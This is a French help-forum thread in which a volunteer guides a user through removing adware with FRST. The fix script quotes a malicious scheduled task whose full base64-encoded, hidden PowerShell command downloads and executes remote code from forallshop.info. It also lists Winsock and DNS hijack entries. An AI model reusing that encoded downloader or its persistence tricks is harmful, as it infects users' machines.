Security-X

Forum Security-X => Désinfections => Discussion démarrée par: delph le janvier 08, 2016, 21:52:49

Titre: ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 08, 2016, 21:52:49
Bonjour et meilleurs voeux 2016

Je possède un portable HP avec un anti virus McAfee.
il y a des pages de pubs qui s'ouvrent systématiquement m'indiquant que mon ordinateur est infecté et je n'arrive pas à m'en débarrasser pouvez vous m'aider svp?
A bientôt
Marie
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 09, 2016, 10:11:52
bonjour

on va utiliser un outil de diagnostique



/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

choisis ci-dessous la version compatible avec ton système (32 bits ou 64 bits)
et Important, Enregistre FRST sur ton Bureau

Clique sur ce lien si tu ne sais pas: Comment savoir quelle version 32 bits ou 64 bits est exécutée sur mon système ? (http://windows.microsoft.com/fr-fr/windows7/find-out-32-or-64-bit)


Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même


*****


tu as donc deux rapports à fournir
--> FRST.txt
--> Addition.txt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 10, 2016, 15:30:44
Bonjour,
Et merci. Voici les 2 liens pour les 2 fichiers.

http://up.security-x.fr/file.php?h=Rade88c14a629bd931b0af9c21bc182e2
http://up.security-x.fr/file.php?h=Ra0595666266c236a2587875f36d82829

A bientôt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 10, 2016, 17:48:55
re

le rapport FRST.txt est incomplet
Peux tu le refaire, stp

il doit finir par:
==================== Fin de FRST.txt ============================


***


En attendant

Tu as deux antivirus actifs sur ton système, ce qui peut engendrer des conflits et rendre instable ton système

Désactive
--> sois Windows Defender (http://www.windows8facile.fr/desactiver-antivirus-windows-8/)
--> sois McAfee


***


Depuis l’écran d’accueil de Windows , tapes programmes , choisis la catégorie Paramètres et ouvrir Ajouter ou supprimer des programmes

Désinstalle via Panneau de configuration -> Désinstaller un programme:  (si un programme ne veut pas se désinstaller ou bien absent de la liste, passes à la suite)

--> Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - )
--> Web Shield (arnaque)


--> Adobe Shockwave Player 12.0 (pas à jour = faille de sécurité) 


***

en attente du rapport FRST.txt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 10, 2016, 20:42:17
Re bonjour,

Windows 8 me dit que Windows defender est déjà désactivé.
Je n'ai pas réussi à désinstaller WEB SHIELD.

J'ai remis les 2 fichiers.
http://up.security-x.fr/file.php?h=R2274fe86b22ccbd4ba0eb133317e19e9
http://up.security-x.fr/file.php?h=R2274fe86b22ccbd4ba0eb133317e19e9

merci encore
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 11, 2016, 17:10:25
re

Arf, tu as posté deux fois Addition.txt

Tu dois avoir sur ton bureau un fichier FRST.txt
Peux tu vérifier ?

Si tu ne le trouves pas, ce n'est pas grave
Sur ton bureau, tu fais un clic droit sur FRST.exe et choisis exécuter en tant qu'administrateur
Tu cliques ensuite sur Analyser et tu auras FRST.txt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 11, 2016, 18:21:42
Re,
Désolé, voici le fichier :

http://up.security-x.fr/file.php?h=R71d3615af853db2005cf8b5f3909a6e3

merci
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 12, 2016, 19:10:14
re

il faut faire attention lors de l'installation de logiciels, ce n'est pas anodin
Il faut décocher les cases pré-cochées des sponsors, ton antivirus n'y peux rien puisque l'installation est validée


***

FRST - Correctif :

--> Ouvre le Bloc-notes Aide en image pour ouvrir le bloc note windows 8 (http://www.chantal11.com/2014/04/ouvrir-le-bloc-notes-windows-8-1/)
Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes
--> de start inclus dans le copié à end inclus dans le copié

start
CreateRestorePoint:
CloseProcesses:
Task: {4373446F-0D4A-443A-8CA7-8568104AF489} - System32\Tasks\{23474816-CA3A-4A9F-821D-2D4062F66B49} => pcalua.exe -a C:\ProgramData\WebShield\uninstall.exe -c /kb=y /ic=1
Task: {7C298525-876A-4277-8EF2-BACC167EFC4A} - System32\Tasks\{7A7D7A47-0A7D-080A-7811-7D057D09110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGwAVgAxAEoARgByAE4AagBrADcAZQBqAHoAZABVAHMATgB6ADgASQBFAG0AYwB0AE0AaQA0AEQAVQBEADAATgBLAG8AZwBGAEEAVQBlAGoAOAB0AE4AWgBqAHYAMgBSAEsAMwBIAFEAMQBNAGwAMQAwAHYANgBXAFcASgBiAFQATQBxAFoAcQB2ADIASQA5AGYAQwBNAHgAbgBrADQAaAA1AHUAVwAzADgAUgBnAGkAbwBQADEAQgBvAHgAdABNAGIAUwBUAF8AdQBSAGEAYQB5AEsATABsAGMAegBTAGcAdQBqAGYAWABIADgAYQBvAEUAcABxAEIAaQA2AHMAZgBwAGoANQBDAEoARgBsADYARABIAEoAcQBhAEwAWQB2AEoAbgA3AEkATABaAGkAZwBLAHYAbwB2AGQARQBTADIARQBhADkAdwBoAGQAawBHAFIASwBIAHkAQgBLAFUAUgBNAEgAeABGAFIATgBXAEEAdQAtAE0AbgBVAFkATAB1AEgAZQBtADYAUgBMAHcATQBlAEYAdAA4AHAAeABlAC0AYwBGAHMAMwBXAGMAdwB0AEYAYQBDAFUATQBaAFkAWABjAEIAZgBKADIASQBVAGMATQBNAE8AXwBwAHgAMgBaAGUAOQBrAGUAdAA2ADMAWABPAEoAVABSAFYAOAAyAEEAVwBYAFAAawB1ADQAawBQAGEAdgBNAEkAZQBjAEQATQBWAEMAYQBNAG8AOQBxAGkAQgA4AHoATgA1AEQANwBHAGMAeQBpADQAeABVAGYAdABvAHAASgByAHEAawAxAHMANABQAG0AQwBJAGcAcQB3AG0AOQA5AG0AagA0AHoANwBmAEgANQBvAEIAUwBTAGUAQgBvAGsANQA4AEIAYQBJAGwASgBMAEkAcQBVAG0AegBLAEkAdwBjADMAdABQAGIAWABmADEANwBNAGcAMgB3AHYANwBOAE0AZwBQAGIAWQBtAEIAWgB5AHYAMgBKAGIAOABjAHkATAAyAHoAcwBRAF8AaABaAEYAaQB4AGYAYQBBAGQAYQBFAHIAQwBNADEAVQBsAC0AMABuAEYASgA2AEsAeABLAFAATgBKAEgAaABGAGEAMQA5ADcASgBFAEQAVgBaAEEAYwBzAHgASABhAE0ARgA0AEYAaQBNAG8ANQBHAEMAUQBGAHgAbABuAFkAbQBDAGMAUAB2AEQAaABSAFMAdQBoAFYALQBHAEsAcABhAE4ARABPAEcAYgAzAHMAVwBQAEMANwBhAFQAagBuADgAeQBFAEkAbQBfAEkAdABJAEgAdQBCADYAdwBtADMAWQBlAE8AUwBJAGIAUAB2AGMAYQBlAEEAZwA3ADUAWQB1ADIAeAAwAFQAWQBQAHYAYgBkAGoAUgBRAC0AXwBQAEMANwBPAEgAUwAyAGYAUwBuAHoAVwAyAGsAaQBpAHcAMwA4AEoAQgBjAGYAYwBqAEsASQAxAGEAUwBMAHcATABzAHQAZgBwAEUAMgBTADYARQBmAEwAdgBPAEIAWgBWAGoATwBUAHgARAByADkAagBJAFoAWQAyAGMAdABHAEUAVgBnAEkAcQBtAE8AaABNAHQAbwBQAHMAawBJAHYAdQB5ADUAaABTAC0AcABUAF8AbQAyAEIAUgA3AGMAbgBrAGcAagBLAG8AMwB5AEsAcgBJADAATwBKAFIAbABQAFQANwAxAFgATwBSAFEALQB5AGsAWgBGAEIAUwBzAHcAcwB6AFgAbgBaADkAYgA4AGYAOABBAHEAUgBGADgAVQBsAGEAdgB5AHkAVQBWAGQATABCADQAMgB2ADAAYwB6ADIAUgBBAFAAcwBQAGMAZwB1AFoANABaAFMAdgAzAHAAaQBvAEwARwBrAFMATQBlAGYAQgBOAGIAYQByAEMAOQBXAG0AegBGAEUAUgBWAG8AdABpADMAbgBDAE8AMgBhAGsARAA0AHUAaQBQADMAagBmAGMAWgB1AGYAbQAyADgATgAzAGgARABYADMAcgBPAEQAUgBsAHIAdgBTAE4AWgBQAE0AUwAzAEMAeQBpADUAdAB1AGcAZwBBAHkAdQAwAEYAbwBFADQATAB3ADEAcwBxAFYAQgBwAHMANQA4AHoAZQBDADgAcQA5AGgARQA0ADgAYgBhAFIAMwBIAFEAcgBuAGMAUwBOAFgAdwBhAHoATgBPAHQAMgBOAFoAUAB0AFUAaQAwAGwATABMAE0AQQBNAHEARQBZAGsARQBoAEwAcgBiAC0ATQB0AEwAcwB0AGoASwByAEQAZwBDADUAdwA4ADYAdQBXAEsAWQA0AFAAagBIAGMAbwBvAGMAaQBxAFkAbgBxAG0AdQAtAEkAMwBsAHEAdgAmAGMAPQBlAEQATAB6AGcASwBBAEsAOQBMADcAUgBGAGcASABYAHAAWQB3AEUAeQBPADkAaABOAHkAcABoAEEAegBhAGgAeQAzAHMARABZAG0ANABPAFoATgA0ADAAZgBRADAARwBhAEYAMwB1ADkAVgBiAEMAWQB3AFAAdwBOADcATwBiAEQASwBaADQAbABGAEYAZwBBAC0AeQBGAFQAMwBlADYASgBWAE0AZQAtAHgAOQBlAG8ATABEAGsAeQAyAEsAXwA3AEQAdQBfAGkAYwBZAHQAQQBuAGkATwBpAE4ANAA1AFEAdgByADUANgBXADYAdwAzAFgAcwBsAGYAXwBwAEMAaABzAEgAdgBLAEEAWABQAFoAdgAtAHcAaQBnAFUAWgB6AHUAVwBIAHIATQB5AHIAUgB4AF8ASgBRAE8ARQB6AEsASwBKAHoASgA3AEcAZQBGAGIAQgA0AHIANQBjADYAdABhAHAAbgB0AFoATABxAFIATABUAHQAWgBxAHIAYwBPADEAaABvAEwANQBhAGMASQBGAHQAWgBXAFQAZABOAFIAXwBrAHMAcAB2AFQAQQBrAEUAcwBSAFoAQwBxAHAARQBoAGoARgBjADUAcABCAHMAUABwAFQAMAA1AFcAeQBLAGYAZwBjAGsAMABPAFcATABPADIAYwBRAHAAVAB2AEYAMABJAHUAawBLAGwAUgBOAFkAQwA3AHgAbABiAHMAZwAzAEQAWgAtAFMAawBWAEgAeQBwAFAASgA0AE4AaQBmAG8ALQBzAG8AcgBFAG4AZgBVAFgAZgBiAGMAcwBmAEMANgBfAEsAdQBVAE8AbgBJADYANgBTAGcAMwBRAEQAdwA2AE0ANwBjAHIATQB0AE4ANAB0AEgAawBOADAAUQA5ADMANABXAEMAcwBQAEEATgBlAFUAOQBMAFMAOQBmAFgARgB2AHAATgB6AGQAZQBGAGcAZgBZAEoAQwAxAGgAdgBEAEUAYgA0AGwAUgBfAFIAcAAtAC0AaQBnAEsAMwBQAE0AeQBjAEQAUABpAGQAcgBlAEUAcgBvAFAAcABDAHQAcABCAG8AZQBxAGwAQgBBAGkAUQBnAEIAcgBoAFUAWAA3AGsAMABkAFIAdgAxAGYAZAB4AFQAVgBkAHoASQBmADIASQBvAEEAeAB3AE8AWgBCAGEAYgA3AFgAVwB4AEwATwBMAHEAaABCAEMAUgAzAEMAQwBnAEUAQgB6AFQANABHAE4AMgBXAGQAMgA0AC0AbwBxAFgAcgB1AHQAbQBCADYAWgAxAGIAbwBuAE0ARQBKAEYAMwBlAEQAegBnAGgAWgBuAGYAVQBjADEAZwBlAGsARABrAGgAMABIAE4AMQBUAEIAdABoAGoAcABhAFMAMABIAGEANABWAFkARABzAG4AQwBEAGUAdABHADUAMABqAE4AdQBuAHcARgB6ADUAMgA1AG4ARQBoAEoANQBvAEgAaABPAFgAUABIAGcAeABPAEwAMABBAC0AbQBCAGMAagBaAFUAOQAwAHYAUwB3AE8AZABnADgAVABOAFAAZQA5AE4AdQAtAE0AcgBnAEwAXwBjAHoAcABRAGcANQA1AFAANQBfAGEARgBNAC0AegBqAGMAMwBiAHYAeABHAFIATQA0AEEAYwBMAEYAYgBmAEQAeQBUAEMAMQBZAGQATABHAGoAVQAxAGoAZwBxADMASQBWAEEANQBaAEoAMgA4AHUARABWAEUATwA5AGMATQBKAGkAVAB4AFkAZgBkAFgARQBaAHoAQQB4AGYAVwBqAHcAQwBfAFUAYgBZAFIAeQBsAFIAVgBhAGEAOQB5AEIAcABJAHIAdQBIADIARABzAGsARABpAHEAZQBPAHoAdgBfAG0AUwBvAEYAYwBMAFAAMABoAFQAcABtAFgAQgBMAE8AeQBWAHgANgBoAEcAUwBVAHQAeABBAFUAdgBXAEkAYwAyADAAZAAtAHIAMQBUAEYANQB3ADMAMQA1AFUAbwBUADAAUQB4AFUAQgA5ADgANwBUAGkAUQBYAFYAcwA4AEwAQgBNAHEAMgBrAFcAYwBaAFcARQBZAEIASABhADUAcgBBAFkAdgBhAGEAWgBrAEMALQBhADYAaABOAFoAVwA0AHgAQgBHAFQARwBWADIAcwBNAC0AeQBqAE8AVAB3AHkAbwBUAGcAaABIAGgARgBPAE8ARgA4AFoAZQB6AFgAUQBSAGcANwB4AF8ANwBYADEAWQBrAGIARwBEAFAAdwAxAFcATgBBAG4AbgBmAFIAUgBWAFAAQwBxAGsATQBpADMAMABpAEUARQA0AFMANwBzAEMAdgA5AE8AdQBIAHgAWgA3ADIAagBhAEIAcQBJAEYARgB3AG0AaQBaAEMATABTAHUAbgA1AEQAWgBuADAAXwBOAFoAQgBWAHQAVwBLAFQAYwBXACYAcgA9ADQAOAA4ADgAMAA1ADUAOQA3ADIAMQA2ADkAOQAxADcAOAAxADIAIgA7ACQAcwB0AHMAawA9ACIAewA3AEEANwBEADcAQQA0ADcALQAwAEEANwBEAC0AMAA4ADAAQQAtADcAOAAxADEALQA3AEQAMAA1ADcARAAwADkAMQAxADAAQgB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFYAMgAzAFoAMgBWADEAVgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {D3923B72-B127-42A9-BE03-4122F9F60115} - System32\Tasks\Dlaauafoomg => C:\ProgramData\Dlaauafoomg\1.0.7.1\iofurhab.exe [2015-12-21] ()
HKLM\...\Run: [3D BubbleSound] => "C:\Program Files\BubbleSound\3D BubbleSound.exe" 
HKLM-x32\...\Run: [mpck_en_004090183] => [X]
Winsock: Catalog9 01 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9 02 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9 03 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9 04 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9 16 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9-x64 01 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Winsock: Catalog9-x64 02 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Winsock: Catalog9-x64 03 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Winsock: Catalog9-x64 04 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Winsock: Catalog9-x64 16 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Tcpip\..\Interfaces\{27C6EE60-3845-4EE0-87F1-C0A841FF81EE}: [NameServer] 104.197.191.4 
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF HKLM\...\Firefox\Extensions: [{C046C13D-2B16-478B-a0DE-133F81EBFCBA}] - C:\Program Files\shopperz221220151212\Firefox\{C046C13D-2B16-478B-a0DE-133F81EBFCBA}.xpi => non trouvé(e)
FF HKLM-x32\...\Firefox\Extensions: [{C046C13D-2B16-478B-a0DE-133F81EBFCBA}] - C:\Program Files\shopperz221220151212\Firefox\{C046C13D-2B16-478B-a0DE-133F81EBFCBA}.xpi => non trouvé(e)
CHR HomePage: Default -> hxxp://www.oursurfing.com/?type=sy&ts=1439716213&z=1b402b73c9149486e8baeb9gbz3c3tam0g3q9o9g0c&from=age&uid=ST1000LM024XHN-M101MBB_S31LJ9AG316460
CHR Extension: (Recherche Google) - C:\Users\MARIE\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-29]
CHR Extension: (Lastie) - C:\Users\MARIE\AppData\Local\Google\Chrome\User Data\Default\Extensions\dimfohdigjaffdaanhmbocfkpolglnjk [2015-12-29]
CHR Extension: (Smart Display) - C:\Users\MARIE\AppData\Local\Google\Chrome\User Data\Default\Extensions\engaigpbgdjjmanonjcjkcmomgibneba [2015-12-29]
CHR Extension: (Search People) - C:\Users\MARIE\AppData\Local\Google\Chrome\User Data\Default\Extensions\papbadoldddalgcjcicnikcfenodpghp [2015-12-29]
R2 sefSYs; C:\ProgramData\FyyMnPGnu\sefSYs.exe [3000824 2015-12-21] (Irrational Number Applications)
S2 Ravgug; "C:\Users\MARIE\AppData\Roaming\PohetFobvae\Ogokgoml.exe" -cms [X] 
U3 mfeaack01; pas de ImagePath
U3 mfeavfk01; pas de ImagePath
U3 mfehidk01; pas de ImagePath
2016-01-06 08:21 - 2016-01-06 08:19 - 00013752 _____ (Microsoft) C:\Users\MARIE\AppData\Roaming\LaunchBrowser_ed.exe
2016-01-06 08:21 - 2016-01-06 08:19 - 00000182 _____ C:\Users\MARIE\AppData\Roaming\LaunchBrowser_ed.exe.config
2016-01-06 08:19 - 2016-01-06 08:19 - 00000000 ____D C:\Users\MARIE\AppData\Local\speed browser
2015-12-24 18:14 - 2016-01-06 20:00 - 00000000 ____D C:\ProgramData\Radio
2015-12-24 17:49 - 2015-12-24 17:49 - 00000000 ____D C:\WebShield
2015-12-22 13:25 - 2015-12-22 13:25 - 00000000 ____D C:\Windows\system32\rejb
2015-12-22 13:21 - 2015-12-22 13:21 - 00004760 _____ C:\Windows\SysWOW64\Xebzuta.ini
2015-12-22 13:21 - 2015-12-22 13:21 - 00003340 _____ C:\Windows\System32\Tasks\Woeno
2015-12-22 13:21 - 2015-12-22 13:21 - 00002480 _____ C:\Windows\SysWOW64\XebzutaOff.ini
2015-12-22 13:21 - 2015-12-22 13:21 - 00002480 _____ C:\Windows\system32\XebzutaOff.ini
2015-12-22 13:21 - 2015-12-22 13:21 - 00000000 ____D C:\Users\MARIE\AppData\LocalLow\Company
2015-12-22 13:21 - 2015-12-22 13:21 - 00000000 ____D C:\Users\MARIE\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2015-12-22 13:21 - 2015-12-22 13:21 - 00000000 ____D C:\Users\MARIE\AppData\Local\Tempfolder
2015-12-22 13:21 - 2015-12-22 13:21 - 00000000 ____D C:\uninst
2015-12-22 13:21 - 2015-12-22 11:14 - 00375144 _____ C:\Windows\system32\Xebzuta64.dll
2015-12-22 13:21 - 2015-12-22 11:14 - 00289128 _____ C:\Windows\SysWOW64\Xebzuta.dll
2015-12-22 11:15 - 2015-12-22 13:21 - 00056728 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\cherimoya.sys
2015-12-22 00:52 - 2015-12-22 13:32 - 00000000 ____D C:\ProgramData\Browser
2015-12-22 13:21 - 2015-12-22 11:14 - 00375144 _____ () C:\Windows\system32\Xebzuta64.dll
2015-12-21 21:29 - 2015-12-21 21:29 - 00003094 _____ C:\Windows\System32\Tasks\{23474816-CA3A-4A9F-821D-2D4062F66B49}
2015-12-21 15:36 - 2015-12-21 15:36 - 00158720 _____ () C:\ProgramData\Dlaauafoomg\1.0.7.1\iofurhab.exe
2015-12-21 15:36 - 2016-01-10 17:44 - 00003442 _____ C:\Windows\System32\Tasks\Dlaauafoomg
2015-12-21 15:36 - 2015-12-21 15:36 - 00000000 ____D C:\ProgramData\Dlaauafoomg
2015-12-21 15:33 - 2016-01-10 19:26 - 00000000 ____D C:\Users\MARIE\AppData\Local\WebShield
2015-12-21 15:31 - 2015-12-21 15:34 - 00000000 ____D C:\ProgramData\FyyMnPGnu
2015-12-21 15:31 - 2015-12-21 15:31 - 00023024 _____ C:\Windows\System32\Tasks\{7A7D7A47-0A7D-080A-7811-7D057D09110B}
2015-12-21 15:31 - 2015-12-21 15:31 - 00000000 ____D C:\ProgramData\15defdac-41e7-0
2015-12-21 15:30 - 2015-12-21 21:29 - 00000000 ____D C:\ProgramData\WebShield
2015-12-21 15:30 - 2015-12-21 15:30 - 00000000 ____D C:\Users\MARIE\AppData\Local\Setup Wizard
2015-12-21 15:30 - 2015-12-21 15:30 - 00000000 ____D C:\ProgramData\15defdac-49d3-1
2015-12-16 23:34 - 2015-12-16 23:34 - 00003108 _____ C:\Windows\System32\Tasks\{80ED55F8-296C-45A6-9739-231C9BBA3888}
2016-01-06 08:21 - 2016-01-06 08:21 - 0032038 _____ () C:\Users\MARIE\AppData\Roaming\Edge.ico
2016-01-06 08:21 - 2016-01-06 08:19 - 0013752 _____ (Microsoft) C:\Users\MARIE\AppData\Roaming\LaunchBrowser_ed.exe
